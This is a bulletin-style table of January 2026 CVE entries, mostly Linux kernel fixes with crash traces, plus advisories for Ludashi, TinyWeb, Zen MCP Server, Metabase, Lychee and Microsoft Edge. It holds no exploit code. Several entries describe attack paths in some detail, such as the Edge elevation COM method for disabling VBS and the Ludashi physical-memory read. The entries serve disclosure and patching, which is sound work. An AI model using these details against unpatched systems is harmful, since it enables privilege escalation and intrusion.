| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: LoongArch: BPF: Sign extend kfunc call arguments The kfunc calls are native calls so they should follow LoongArch calling conventions. Sign extend its arguments properly to avoid kernel panic. This is done by adding a new emit_abi_ext() helper. The emit_abi_ext() helper performs extension in place, meaning on a value already stored in the target register (Note: this is different from the existing sign_extend() helper and thus we can't reuse it). | 2026-01-14 | not yet calculated | CVE-2025-71129 | https://git.kernel.org/stable/c/fd43edf357a3a1f5ed1c4bf450b60001c9091c39 https://git.kernel.org/stable/c/0d666db731e95890e0eda7ea61bc925fd2be90c6 https://git.kernel.org/stable/c/321993a874f571a94b5a596f1132f798c663b56e https://git.kernel.org/stable/c/3f5a238f24d7b75f9efe324d3539ad388f58536e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer Initialize the eb.vma array with values of 0 when the eb structure is first set up. In particular, this sets the eb->vma[i].vma pointers to NULL, simplifying cleanup and getting rid of the bug described below. During the execution of eb_lookup_vmas(), the eb->vma array is successively filled up with struct eb_vma objects. This process includes calling eb_add_vma(), which might fail; however, even in the event of failure, eb->vma[i].vma is set for the currently processed buffer. If eb_add_vma() fails, eb_lookup_vmas() returns with an error, which prompts a call to eb_release_vmas() to clean up the mess. Since eb_lookup_vmas() might fail during processing any (possibly not first) buffer, eb_release_vmas() checks whether a buffer's vma is NULL to know at what point did the lookup function fail. In eb_lookup_vmas(), eb->vma[i].vma is set to NULL if either the helper function eb_lookup_vma() or eb_validate_vma() fails. eb->vma[i+1].vma is set to NULL in case i915_gem_object_userptr_submit_init() fails; the current one needs to be cleaned up by eb_release_vmas() at this point, so the next one is set. If eb_add_vma() fails, neither the current nor the next vma is set to NULL, which is a source of a NULL deref bug described in the issue linked in the Closes tag. When entering eb_lookup_vmas(), the vma pointers are set to the slab poison value, instead of NULL. This doesn't matter for the actual lookup, since it gets overwritten anyway, however the eb_release_vmas() function only recognizes NULL as the stopping value, hence the pointers are being set to NULL as they go in case of intermediate failure. This patch changes the approach to filling them all with NULL at the start instead, rather than handling that manually during failure. (cherry picked from commit 08889b706d4f0b8d2352b7ca29c2d8df4d0787cd) | 2026-01-14 | not yet calculated | CVE-2025-71130 | https://git.kernel.org/stable/c/25d69e07770745992387c016613fd7ac8eaf9893 https://git.kernel.org/stable/c/0336188cc85d0eab8463bd1bbd4ded4e9602de8b https://git.kernel.org/stable/c/24d55ac8e31d2f8197bfad71ffcb3bae21ed7117 https://git.kernel.org/stable/c/63f23aa2fbb823c8b15a29269fde220d227ce5b3 https://git.kernel.org/stable/c/4fe2bd195435e71c117983d87f278112c5ab364c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: seqiv - Do not use req->iv after crypto_aead_encrypt As soon as crypto_aead_encrypt is called, the underlying request may be freed by an asynchronous completion. Thus dereferencing req->iv after it returns is invalid. Instead of checking req->iv against info, create a new variable unaligned_info and use it for that purpose instead. | 2026-01-14 | not yet calculated | CVE-2025-71131 | https://git.kernel.org/stable/c/18202537856e0fae079fed2c9308780bcff2bb9d https://git.kernel.org/stable/c/baf0e2d1e03ddb04781dfe7f22a654d3611f69b2 https://git.kernel.org/stable/c/50f196d2bbaee4ab2494bb1b0d294deba292951a https://git.kernel.org/stable/c/0279978adec6f1296af66b642cce641c6580be46 https://git.kernel.org/stable/c/ccbb96434d88e32358894c879457b33f7508e798 https://git.kernel.org/stable/c/5476f7f8a311236604b78fcc5b2a63b3a61b0169 https://git.kernel.org/stable/c/50fdb78b7c0bcc550910ef69c0984e751cac72fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smc91x: fix broken irq-context in PREEMPT_RT When smc91x.c is built with PREEMPT_RT, the following splat occurs in FVP_RevC: [ 13.055000] smc91x LNRO0003:00 eth0: link up, 10Mbps, half-duplex, lpa 0x0000 [ 13.062137] BUG: workqueue leaked atomic, lock or RCU: kworker/2:1[106] [ 13.062137] preempt=0x00000000 lock=0->0 RCU=0->1 workfn=mld_ifc_work [ 13.062266] C ** replaying previous printk message ** [ 13.062266] CPU: 2 UID: 0 PID: 106 Comm: kworker/2:1 Not tainted 6.18.0-dirty #179 PREEMPT_{RT,(full)} [ 13.062353] Hardware name: , BIOS [ 13.062382] Workqueue: mld mld_ifc_work [ 13.062469] Call trace: [ 13.062494] show_stack+0x24/0x40 (C) [ 13.062602] __dump_stack+0x28/0x48 [ 13.062710] dump_stack_lvl+0x7c/0xb0 [ 13.062818] dump_stack+0x18/0x34 [ 13.062926] process_scheduled_works+0x294/0x450 [ 13.063043] worker_thread+0x260/0x3d8 [ 13.063124] kthread+0x1c4/0x228 [ 13.063235] ret_from_fork+0x10/0x20 This happens because smc_special_trylock() disables IRQs even on PREEMPT_RT, but smc_special_unlock() does not restore IRQs on PREEMPT_RT. The reason is that smc_special_unlock() calls spin_unlock_irqrestore(), and rcu_read_unlock_bh() in __dev_queue_xmit() cannot invoke rcu_read_unlock() through __local_bh_enable_ip() when current->softirq_disable_cnt becomes zero. To address this issue, replace smc_special_trylock() with spin_trylock_irqsave(). | 2026-01-14 | not yet calculated | CVE-2025-71132 | https://git.kernel.org/stable/c/1c4cb705e733250d13243f6a69b8b5a92e39b9f6 https://git.kernel.org/stable/c/9d222141b00156509d67d80c771fbefa92c43ace https://git.kernel.org/stable/c/ef277ae121b3249c99994652210a326b52d527b0 https://git.kernel.org/stable/c/36561b86cb2501647662cfaf91286dd6973804a6 https://git.kernel.org/stable/c/b6018d5c1a8f09d5efe4d6961d7ee45fdf3a7ce3 https://git.kernel.org/stable/c/6402078bd9d1ed46e79465e1faaa42e3458f8a33 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: avoid invalid read in irdma_net_event irdma_net_event() should not dereference anything from "neigh" (alias "ptr") until it has checked that the event is NETEVENT_NEIGH_UPDATE. Other events come with different structures pointed to by "ptr" and they may be smaller than struct neighbour. Move the read of neigh->dev under the NETEVENT_NEIGH_UPDATE case. The bug is mostly harmless, but it triggers KASAN on debug kernels: BUG: KASAN: stack-out-of-bounds in irdma_net_event+0x32e/0x3b0 [irdma] Read of size 8 at addr ffffc900075e07f0 by task kworker/27:2/542554 CPU: 27 PID: 542554 Comm: kworker/27:2 Kdump: loaded Not tainted 5.14.0-630.el9.x86_64+debug #1 Hardware name: [...] Workqueue: events rt6_probe_deferred Call Trace: <IRQ> dump_stack_lvl+0x60/0xb0 print_address_description.constprop.0+0x2c/0x3f0 print_report+0xb4/0x270 kasan_report+0x92/0xc0 irdma_net_event+0x32e/0x3b0 [irdma] notifier_call_chain+0x9e/0x180 atomic_notifier_call_chain+0x5c/0x110 rt6_do_redirect+0xb91/0x1080 tcp_v6_err+0xe9b/0x13e0 icmpv6_notify+0x2b2/0x630 ndisc_redirect_rcv+0x328/0x530 icmpv6_rcv+0xc16/0x1360 ip6_protocol_deliver_rcu+0xb84/0x12e0 ip6_input_finish+0x117/0x240 ip6_input+0xc4/0x370 ipv6_rcv+0x420/0x7d0 __netif_receive_skb_one_core+0x118/0x1b0 process_backlog+0xd1/0x5d0 __napi_poll.constprop.0+0xa3/0x440 net_rx_action+0x78a/0xba0 handle_softirqs+0x2d4/0x9c0 do_softirq+0xad/0xe0 </IRQ> | 2026-01-14 | not yet calculated | CVE-2025-71133 | https://git.kernel.org/stable/c/db93ae6fa66f1c61ae63400191195e3ee58021da https://git.kernel.org/stable/c/305c02e541befe4a44ffde30ed374970f41aeb6c https://git.kernel.org/stable/c/fc23d05f0b3fb4d80657e7afebae2cae686b31c8 https://git.kernel.org/stable/c/bf197c7c79ef6458d1ee84dd7db251b51784885f https://git.kernel.org/stable/c/d9b9affd103f51b42322da4ed5ac025b560bc354 https://git.kernel.org/stable/c/6f05611728e9d0ab024832a4f1abb74a5f5d0bb0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/page_alloc: change all pageblocks migrate type on coalescing When a page is freed it coalesces with a buddy into a higher order page while possible. When the buddy page migrate type differs, it is expected to be updated to match the one of the page being freed. However, only the first pageblock of the buddy page is updated, while the rest of the pageblocks are left unchanged. That causes warnings in later expand() and other code paths (like below), since an inconsistency between migration type of the list containing the page and the page-owned pageblocks migration types is introduced. [ 308.986589] ------------[ cut here ]------------ [ 308.987227] page type is 0, passed migratetype is 1 (nr=256) [ 308.987275] WARNING: CPU: 1 PID: 5224 at mm/page_alloc.c:812 expand+0x23c/0x270 [ 308.987293] Modules linked in: algif_hash(E) af_alg(E) nft_fib_inet(E) nft_fib_ipv4(E) nft_fib_ipv6(E) nft_fib(E) nft_reject_inet(E) nf_reject_ipv4(E) nf_reject_ipv6(E) nft_reject(E) nft_ct(E) nft_chain_nat(E) nf_nat(E) nf_conntrack(E) nf_defrag_ipv6(E) nf_defrag_ipv4(E) nf_tables(E) s390_trng(E) vfio_ccw(E) mdev(E) vfio_iommu_type1(E) vfio(E) sch_fq_codel(E) drm(E) i2c_core(E) drm_panel_orientation_quirks(E) loop(E) nfnetlink(E) vsock_loopback(E) vmw_vsock_virtio_transport_common(E) vsock(E) ctcm(E) fsm(E) diag288_wdt(E) watchdog(E) zfcp(E) scsi_transport_fc(E) ghash_s390(E) prng(E) aes_s390(E) des_generic(E) des_s390(E) libdes(E) sha3_512_s390(E) sha3_256_s390(E) sha_common(E) paes_s390(E) crypto_engine(E) pkey_cca(E) pkey_ep11(E) zcrypt(E) rng_core(E) pkey_pckmo(E) pkey(E) autofs4(E) [ 308.987439] Unloaded tainted modules: hmac_s390(E):2 [ 308.987650] CPU: 1 UID: 0 PID: 5224 Comm: mempig_verify Kdump: loaded Tainted: G E 6.18.0-gcc-bpf-debug #431 PREEMPT [ 308.987657] Tainted: [E]=UNSIGNED_MODULE [ 308.987661] Hardware name: IBM 3906 M04 704 (z/VM 7.3.0) [ 308.987666] Krnl PSW : 0404f00180000000 00000349976fa600 (expand+0x240/0x270) [ 308.987676] R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:3 PM:0 RI:0 EA:3 [ 308.987682] Krnl GPRS: 0000034980000004 0000000000000005 0000000000000030 000003499a0e6d88 [ 308.987688] 0000000000000005 0000034980000005 000002be803ac000 0000023efe6c8300 [ 308.987692] 0000000000000008 0000034998d57290 000002be00000100 0000023e00000008 [ 308.987696] 0000000000000000 0000000000000000 00000349976fa5fc 000002c99b1eb6f0 [ 308.987708] Krnl Code: 00000349976fa5f0: c020008a02f2 larl %r2,000003499883abd4 00000349976fa5f6: c0e5ffe3f4b5 brasl %r14,0000034997378f60 #00000349976fa5fc: af000000 mc 0,0 >00000349976fa600: a7f4ff4c brc 15,00000349976fa498 00000349976fa604: b9040026 lgr %r2,%r6 00000349976fa608: c0300088317f larl %r3,0000034998800906 00000349976fa60e: c0e5fffdb6e1 brasl %r14,00000349976b13d0 00000349976fa614: af000000 mc 0,0 [ 308.987734] Call Trace: [ 308.987738] [<00000349976fa600>] expand+0x240/0x270 [ 308.987744] ([<00000349976fa5fc>] expand+0x23c/0x270) [ 308.987749] [<00000349976ff95e>] rmqueue_bulk+0x71e/0x940 [ 308.987754] [<00000349976ffd7e>] __rmqueue_pcplist+0x1fe/0x2a0 [ 308.987759] [<0000034997700966>] rmqueue.isra.0+0xb46/0xf40 [ 308.987763] [<0000034997703ec8>] get_page_from_freelist+0x198/0x8d0 [ 308.987768] [<0000034997706fa8>] __alloc_frozen_pages_noprof+0x198/0x400 [ 308.987774] [<00000349977536f8>] alloc_pages_mpol+0xb8/0x220 [ 308.987781] [<0000034997753bf6>] folio_alloc_mpol_noprof+0x26/0xc0 [ 308.987786] [<0000034997753e4c>] vma_alloc_folio_noprof+0x6c/0xa0 [ 308.987791] [<0000034997775b22>] vma_alloc_anon_folio_pmd+0x42/0x240 [ 308.987799] [<000003499777bfea>] __do_huge_pmd_anonymous_page+0x3a/0x210 [ 308.987804] [<00000349976cb0 ---truncated--- | 2026-01-14 | not yet calculated | CVE-2025-71134 | https://git.kernel.org/stable/c/914769048818021556c940b9163e8056be9507dd https://git.kernel.org/stable/c/a794d65b132107a085d165caba33aae1101316a5 https://git.kernel.org/stable/c/7838a4eb8a1d23160bd3f588ea7f2b8f7c00c55b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() The variable mddev->private is first assigned to conf and then checked: conf = mddev->private; if (!conf) ... If conf is NULL, then mddev->private is also NULL. In this case, null-pointer dereferences can occur when calling raid5_quiesce(): raid5_quiesce(mddev, true); raid5_quiesce(mddev, false); since mddev->private is assigned to conf again in raid5_quiesce(), and conf is dereferenced in several places, for example: conf->quiesce = 0; wake_up(&conf->wait_for_quiescent); To fix this issue, the function should unlock mddev and return before invoking raid5_quiesce() when conf is NULL, following the existing pattern in raid5_change_consistency_policy(). | 2026-01-14 | not yet calculated | CVE-2025-71135 | https://git.kernel.org/stable/c/20597b7229aea8b5bc45cd92097640257c7fc33b https://git.kernel.org/stable/c/e5abb6af905de6b2fead8a0b3f32ab0b81468a01 https://git.kernel.org/stable/c/7ad6ef91d8745d04aff9cce7bdbc6320d8e05fe9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status() It's possible for cp_read() and hdmi_read() to return -EIO. Those values are further used as indexes for accessing arrays. Fix that by checking return values where it's needed. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2026-01-14 | not yet calculated | CVE-2025-71136 | https://git.kernel.org/stable/c/f81ee181cb036d046340c213091b69d9a8701a76 https://git.kernel.org/stable/c/f913b9a2ccd6114b206b9e91dae5e3dc13a415a0 https://git.kernel.org/stable/c/d6a22a4a96e4dfe6897cb3532d2b3016d87706f0 https://git.kernel.org/stable/c/a73881ae085db5702d8b13e2fc9f78d51c723d3f https://git.kernel.org/stable/c/60dde0960e3ead8a9569f6c494d90d0232ac0983 https://git.kernel.org/stable/c/b693d48a6ed0cd09171103ad418e4a693203d6e4 https://git.kernel.org/stable/c/8163419e3e05d71dcfa8fb49c8fdf8d76908fe51 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: octeontx2-pf: fix "UBSAN: shift-out-of-bounds error" This patch ensures that the RX ring size (rx_pending) is not set below the permitted length. This avoids UBSAN shift-out-of-bounds errors when users pass small or zero ring sizes via ethtool -G. | 2026-01-14 | not yet calculated | CVE-2025-71137 | https://git.kernel.org/stable/c/5d8dfa3abb9a845302e021cf9c92d941abbc011a https://git.kernel.org/stable/c/4cc4cfe4d23c883120b6f3d41145edbaa281f2ab https://git.kernel.org/stable/c/658caf3b8aad65f8b8e102670ca4f68c7030f655 https://git.kernel.org/stable/c/b23a2e15589466a027c9baa3fb5813c9f6a6c6dc https://git.kernel.org/stable/c/aa743b0d98448282b2cb37356db8db2a48524624 https://git.kernel.org/stable/c/442848e457f5a9f71a4e7e14d24d73dae278ebe3 https://git.kernel.org/stable/c/85f4b0c650d9f9db10bda8d3acfa1af83bf78cf7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/dpu: Add missing NULL pointer check for pingpong interface It is checked almost always in dpu_encoder_phys_wb_setup_ctl(), but in a single place the check is missing. Also use convenient locals instead of phys_enc->* where available. Patchwork: https://patchwork.freedesktop.org/patch/693860/ | 2026-01-14 | not yet calculated | CVE-2025-71138 | https://git.kernel.org/stable/c/678d1c86566dfbb247ba25482d37fddde6140cc9 https://git.kernel.org/stable/c/471baae774a30a04cf066907b60eaf3732928cb7 https://git.kernel.org/stable/c/35ea3282136a630a3fd92b76f5a3a02651145ef1 https://git.kernel.org/stable/c/88733a0b64872357e5ecd82b7488121503cb9cc6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kernel/kexec: fix IMA when allocation happens in CMA area *** Bug description *** When I tested kexec with the latest kernel, I ran into the following warning: [ 40.712410] ------------[ cut here ]------------ [ 40.712576] WARNING: CPU: 2 PID: 1562 at kernel/kexec_core.c:1001 kimage_map_segment+0x144/0x198 [...] [ 40.816047] Call trace: [ 40.818498] kimage_map_segment+0x144/0x198 (P) [ 40.823221] ima_kexec_post_load+0x58/0xc0 [ 40.827246] __do_sys_kexec_file_load+0x29c/0x368 [...] [ 40.855423] ---[ end trace 0000000000000000 ]--- *** How to reproduce *** This bug is only triggered when the kexec target address is allocated in the CMA area. If no CMA area is reserved in the kernel, use the "cma=" option in the kernel command line to reserve one. *** Root cause *** The commit 07d24902977e ("kexec: enable CMA based contiguous allocation") allocates the kexec target address directly on the CMA area to avoid copying during the jump. In this case, there is no IND_SOURCE for the kexec segment. But the current implementation of kimage_map_segment() assumes that IND_SOURCE pages exist and map them into a contiguous virtual address by vmap(). *** Solution *** If IMA segment is allocated in the CMA area, use its page_address() directly. | 2026-01-14 | not yet calculated | CVE-2025-71139 | https://git.kernel.org/stable/c/a843e4155c83211c55b1b6cc17eab27a6a2c5b6f https://git.kernel.org/stable/c/a3785ae5d334bb71d47a593d54c686a03fb9d136 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mediatek: vcodec: Use spinlock for context list protection lock Previously a mutex was added to protect the encoder and decoder context lists from unexpected changes originating from the SCP IP block, causing the context pointer to go invalid, resulting in a NULL pointer dereference in the IPI handler. Turns out on the MT8173, the VPU IPI handler is called from hard IRQ context. This causes a big warning from the scheduler. This was first reported downstream on the ChromeOS kernels, but is also reproducible on mainline using Fluster with the FFmpeg v4l2m2m decoders. Even though the actual capture format is not supported, the affected code paths are triggered. Since this lock just protects the context list and operations on it are very fast, it should be OK to switch to a spinlock. | 2026-01-14 | not yet calculated | CVE-2025-71140 | https://git.kernel.org/stable/c/2c1ea6214827041f548279c9eda341eda0cc8351 https://git.kernel.org/stable/c/b92c19675f632a41af1222027a231bc2b7efa7ed https://git.kernel.org/stable/c/3e858938b0e659f6ec9ddcf853a87f1c5c3f44e1 https://git.kernel.org/stable/c/a5844227e0f030d2af2d85d4aed10c5eca6ca176 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/tilcdc: Fix removal actions in case of failed probe The drm_kms_helper_poll_fini() and drm_atomic_helper_shutdown() helpers should only be called when the device has been successfully registered. Currently, these functions are called unconditionally in tilcdc_fini(), which causes warnings during probe deferral scenarios. [ 7.972317] WARNING: CPU: 0 PID: 23 at drivers/gpu/drm/drm_atomic_state_helper.c:175 drm_atomic_helper_crtc_duplicate_state+0x60/0x68 ... [ 8.005820] drm_atomic_helper_crtc_duplicate_state from drm_atomic_get_crtc_state+0x68/0x108 [ 8.005858] drm_atomic_get_crtc_state from drm_atomic_helper_disable_all+0x90/0x1c8 [ 8.005885] drm_atomic_helper_disable_all from drm_atomic_helper_shutdown+0x90/0x144 [ 8.005911] drm_atomic_helper_shutdown from tilcdc_fini+0x68/0xf8 [tilcdc] [ 8.005957] tilcdc_fini [tilcdc] from tilcdc_pdev_probe+0xb0/0x6d4 [tilcdc] Fix this by rewriting the failed probe cleanup path using the standard goto error handling pattern, which ensures that cleanup functions are only called on successfully initialized resources. Additionally, remove the now-unnecessary is_registered flag. | 2026-01-14 | not yet calculated | CVE-2025-71141 | https://git.kernel.org/stable/c/21e52dc7762908c3d499cfb493d1b8281fc1d3ab https://git.kernel.org/stable/c/71be8825e83c90c1e020feb77b29e6a99629e642 https://git.kernel.org/stable/c/a585c7ef9cabda58088916baedc6573e9a5cd2a7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpuset: fix warning when disabling remote partition A warning was triggered as follows: WARNING: kernel/cgroup/cpuset.c:1651 at remote_partition_disable+0xf7/0x110 RIP: 0010:remote_partition_disable+0xf7/0x110 RSP: 0018:ffffc90001947d88 EFLAGS: 00000206 RAX: 0000000000007fff RBX: ffff888103b6e000 RCX: 0000000000006f40 RDX: 0000000000006f00 RSI: ffffc90001947da8 RDI: ffff888103b6e000 RBP: ffff888103b6e000 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000001 R11: ffff88810b2e2728 R12: ffffc90001947da8 R13: 0000000000000000 R14: ffffc90001947da8 R15: ffff8881081f1c00 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f55c8bbe0b2 CR3: 000000010b14c000 CR4: 00000000000006f0 Call Trace: <TASK> update_prstate+0x2d3/0x580 cpuset_partition_write+0x94/0xf0 kernfs_fop_write_iter+0x147/0x200 vfs_write+0x35d/0x500 ksys_write+0x66/0xe0 do_syscall_64+0x6b/0x390 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7f55c8cd4887 Reproduction steps (on a 16-CPU machine): # cd /sys/fs/cgroup/ # mkdir A1 # echo +cpuset > A1/cgroup.subtree_control # echo "0-14" > A1/cpuset.cpus.exclusive # mkdir A1/A2 # echo "0-14" > A1/A2/cpuset.cpus.exclusive # echo "root" > A1/A2/cpuset.cpus.partition # echo 0 > /sys/devices/system/cpu/cpu15/online # echo member > A1/A2/cpuset.cpus.partition When CPU 15 is offlined, subpartitions_cpus gets cleared because no CPUs remain available for the top_cpuset, forcing partitions to share CPUs with the top_cpuset. In this scenario, disabling the remote partition triggers a warning stating that effective_xcpus is not a subset of subpartitions_cpus. Partitions should be invalidated in this case to inform users that the partition is now invalid (CPUs are shared with top_cpuset). To fix this issue: 1. Only emit the warning if subpartitions_cpus is not empty and effective_xcpus is not a subset of subpartitions_cpus. 2. During the CPU hotplug process, invalidate partitions if subpartitions_cpus is empty. | 2026-01-14 | not yet calculated | CVE-2025-71142 | https://git.kernel.org/stable/c/5d8b9d38a7676be7bb5e7d57f92156a98dab39fb https://git.kernel.org/stable/c/aa7d3a56a20f07978d9f401e13637a6479b13bd0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: samsung: exynos-clkout: Assign .num before accessing .hws Commit f316cdff8d67 ("clk: Annotate struct clk_hw_onecell_data with __counted_by") annotated the hws member of 'struct clk_hw_onecell_data' with __counted_by, which informs the bounds sanitizer (UBSAN_BOUNDS) about the number of elements in .hws[], so that it can warn when .hws[] is accessed out of bounds. As noted in that change, the __counted_by member must be initialized with the number of elements before the first array access happens, otherwise there will be a warning from each access prior to the initialization because the number of elements is zero. This occurs in exynos_clkout_probe() due to .num being assigned after .hws[] has been accessed: UBSAN: array-index-out-of-bounds in drivers/clk/samsung/clk-exynos-clkout.c:178:18 index 0 is out of range for type 'clk_hw *[*]' Move the .num initialization to before the first access of .hws[], clearing up the warning. | 2026-01-14 | not yet calculated | CVE-2025-71143 | https://git.kernel.org/stable/c/fbf57f5e453dadadb3d29b2d1dbe067e3dc4e236 https://git.kernel.org/stable/c/eb1f3a6ab3efee2b52361879cdc2dc6b11f499c0 https://git.kernel.org/stable/c/a317f63255ebc3dac378c79c5bff4f8d0561c290 https://git.kernel.org/stable/c/cf33f0b7df13685234ccea7be7bfe316b60db4db |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: ensure context reset on disconnect() After the blamed commit below, if the MPC subflow is already in TCP_CLOSE status or has fallback to TCP at mptcp_disconnect() time, mptcp_do_fastclose() skips setting the `send_fastclose flag` and the later __mptcp_close_ssk() does not reset anymore the related subflow context. Any later connection will be created with both the `request_mptcp` flag and the msk-level fallback status off (it is unconditionally cleared at MPTCP disconnect time), leading to a warning in subflow_data_ready(): WARNING: CPU: 26 PID: 8996 at net/mptcp/subflow.c:1519 subflow_data_ready (net/mptcp/subflow.c:1519 (discriminator 13)) Modules linked in: CPU: 26 UID: 0 PID: 8996 Comm: syz.22.39 Not tainted 6.18.0-rc7-05427-g11fc074f6c36 #1 PREEMPT(voluntary) Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 RIP: 0010:subflow_data_ready (net/mptcp/subflow.c:1519 (discriminator 13)) Code: 90 0f 0b 90 90 e9 04 fe ff ff e8 b7 1e f5 fe 89 ee bf 07 00 00 00 e8 db 19 f5 fe 83 fd 07 0f 84 35 ff ff ff e8 9d 1e f5 fe 90 <0f> 0b 90 e9 27 ff ff ff e8 8f 1e f5 fe 4c 89 e7 48 89 de e8 14 09 RSP: 0018:ffffc9002646fb30 EFLAGS: 00010293 RAX: 0000000000000000 RBX: ffff88813b218000 RCX: ffffffff825c8435 RDX: ffff8881300b3580 RSI: ffffffff825c8443 RDI: 0000000000000005 RBP: 000000000000000b R08: ffffffff825c8435 R09: 000000000000000b R10: 0000000000000005 R11: 0000000000000007 R12: ffff888131ac0000 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 FS: 00007f88330af6c0(0000) GS:ffff888a93dd2000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f88330aefe8 CR3: 000000010ff59000 CR4: 0000000000350ef0 Call Trace: <TASK> tcp_data_ready (net/ipv4/tcp_input.c:5356) tcp_data_queue (net/ipv4/tcp_input.c:5445) tcp_rcv_state_process (net/ipv4/tcp_input.c:7165) tcp_v4_do_rcv (net/ipv4/tcp_ipv4.c:1955) __release_sock (include/net/sock.h:1158 (discriminator 6) net/core/sock.c:3180 (discriminator 6)) release_sock (net/core/sock.c:3737) mptcp_sendmsg (net/mptcp/protocol.c:1763 net/mptcp/protocol.c:1857) inet_sendmsg (net/ipv4/af_inet.c:853 (discriminator 7)) __sys_sendto (net/socket.c:727 (discriminator 15) net/socket.c:742 (discriminator 15) net/socket.c:2244 (discriminator 15)) __x64_sys_sendto (net/socket.c:2247) do_syscall_64 (arch/x86/entry/syscall_64.c:63 (discriminator 1) arch/x86/entry/syscall_64.c:94 (discriminator 1)) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) RIP: 0033:0x7f883326702d Address the issue setting an explicit `fastclosing` flag at fastclose time, and checking such flag after mptcp_do_fastclose(). | 2026-01-14 | not yet calculated | CVE-2025-71144 | https://git.kernel.org/stable/c/5c7c7135468f3fc6379cde9777a2c18bfe92d82f https://git.kernel.org/stable/c/1c7c3a9314d8a7fc0e9a508606466a967c8e774a https://git.kernel.org/stable/c/f1a77dfc3b045c3dd5f6e64189b9f52b90399f07 https://git.kernel.org/stable/c/86730ac255b0497a272704de9a1df559f5d6602e |
| Ludashi--Ludashi | A local information disclosure vulnerability exists in the Ludashi driver before 5.1025 due to a lack of access control in the IOCTL handler. This driver exposes a device interface accessible to a normal user and handles attacker-controlled structures containing the lower 4GB of physical addresses. The handler maps arbitrary physical memory via MmMapIoSpace and copies data back to user mode without verifying the caller's privileges or the target address range. This allows unprivileged users to read arbitrary physical memory, potentially exposing kernel data structures, kernel pointers, security tokens, and other sensitive information. This vulnerability can be further exploited to bypass Kernel Address Space Layout Randomization (KASLR) and achieve local privilege escalation. | 2026-01-15 | not yet calculated | CVE-2025-67246 | http://ludashi.com https://github.com/CDipper/CVE-Publication |
| LycheeOrg--Lychee | Lychee is a free, open-source photo-management tool. Prior to 7.1.0, an authorization vulnerability exists in Lychee's album password unlock functionality that allows users to possibly gain unauthorized access to other users' password-protected albums. When a user unlocks a password-protected public album, the system automatically unlocks ALL other public albums that share the same password, resulting in a complete authorization bypass. This vulnerability is fixed in 7.1.0. | 2026-01-12 | not yet calculated | CVE-2026-22784 | https://github.com/LycheeOrg/Lychee/security/advisories/GHSA-jj56-2c54-4f25 https://github.com/LycheeOrg/Lychee/commit/f021a29f9ab2bafa81d9f5e32ff5bc89915c7d41 |
| maximmasiutin--TinyWeb | TinyWeb is a web server (HTTP, HTTPS) written in Delphi for Win32. TinyWeb HTTP Server before version 1.98 is vulnerable to OS command injection via CGI ISINDEX-style query parameters. The query parameters are passed as command-line arguments to the CGI executable via Windows CreateProcess(). An unauthenticated remote attacker can execute arbitrary commands on the server by injecting Windows shell metacharacters into HTTP requests. This vulnerability is fixed in 1.98. | 2026-01-12 | not yet calculated | CVE-2026-22781 | https://github.com/maximmasiutin/TinyWeb/security/advisories/GHSA-m779-84h5-72q2 https://github.com/maximmasiutin/TinyWeb/commit/876b7e2887f4ea5be3e18bb2af7313f23a283c96 https://www.masiutin.net/tinyweb-cve-2025-cgi-command-injection.html |
| MCP Server--Zen | A path traversal vulnerability exists in Zen MCP Server before 9.8.2 that allows authenticated attackers to read arbitrary files on the system. The vulnerability is caused by flawed logic in the is_dangerous_path() validation function that uses exact string matching against a blacklist of system directories. Attackers can bypass these restrictions by accessing subdirectories of blacklisted paths. | 2026-01-12 | not yet calculated | CVE-2025-66689 | https://github.com/BeehiveInnovations/zen-mcp-server/issues/293 https://github.com/Team-Off-course/MCP-Server-Vuln-Analysis/blob/main/CVE-2025-66689.md |
| metabase--metabase | Metabase is an open-source data analytics platform. Prior to 55.13, 56.3, and 57.1, self-hosted Metabase instances that allow users to create subscriptions could be potentially impacted if their Metabase is colocated with other unsecured resources. This vulnerability is fixed in 55.13, 56.3, and 57.1. | 2026-01-12 | not yet calculated | CVE-2026-22805 | https://github.com/metabase/metabase/security/advisories/GHSA-2wgg-7r2p-cmqx |
| Microsoft--Microsoft Edge (Chromium-based) | Microsoft Edge Elevation Service exposes a privileged COM interface that inadequately validates the privileges of the calling process. A standard (non-administrator) local user can invoke the IElevatorEdge interface method LaunchUpdateCmdElevatedAndWait, causing the service to execute privileged update commands as LocalSystem. This allows a non-administrator to enable or disable Windows Virtualization-Based Security (VBS) by modifying protected system registry keys under HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard. Disabling VBS weakens critical platform protections such as Credential Guard, Hypervisor-protected Code Integrity (HVCI), and the Secure Kernel, resulting in a security feature bypass. | 2026-01-16 | not yet calculated | CVE-2026-21223 | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability |
